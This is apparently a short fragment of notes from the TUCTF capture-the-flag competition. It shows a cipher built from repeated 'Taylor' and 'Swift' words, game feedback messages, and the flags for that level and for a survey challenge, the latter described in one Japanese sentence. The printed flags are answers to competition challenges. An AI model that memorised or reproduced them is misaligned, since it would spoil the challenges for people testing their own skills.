TaylorSwiftSwiftTaylorSwift TaylorSwiftTaylorTaylorTaylor TaylorSwiftTaylorTaylorSwift SwiftTaylorSwiftTaylorTaylor TaylorTaylorTaylorTaylorTaylor COMMENDATORY Yeah! You do that Crypto! Decrypt SwiftTaylorTaylorSwiftTaylor TaylorTaylorTaylorTaylorTaylor TaylorSwiftTaylorSwiftTaylor TaylorSwiftTaylorTaylorTaylor TaylorSwiftSwiftTaylorSwift TaylorSwiftTaylorSwiftTaylor TaylorSwiftSwiftTaylorSwift TaylorSwiftSwiftSwiftTaylor TaylorTaylorSwiftTaylorTaylor WORRISOME Ayyyyy Congratulations! You beat Level 7! You must be a real Swiftie. Here's your flag: TUCTF{t4yl0rs_v3rs10n_n3c_3r4s_t0ur}
TUCTF{t4yl0rs_v3rs10n_n3c_3r4s_t0ur}
Survey (Intro/Welcome)
アンケートに答えたら、フラグが表示された。
TUCTF{@we$0m3_S&Uc3}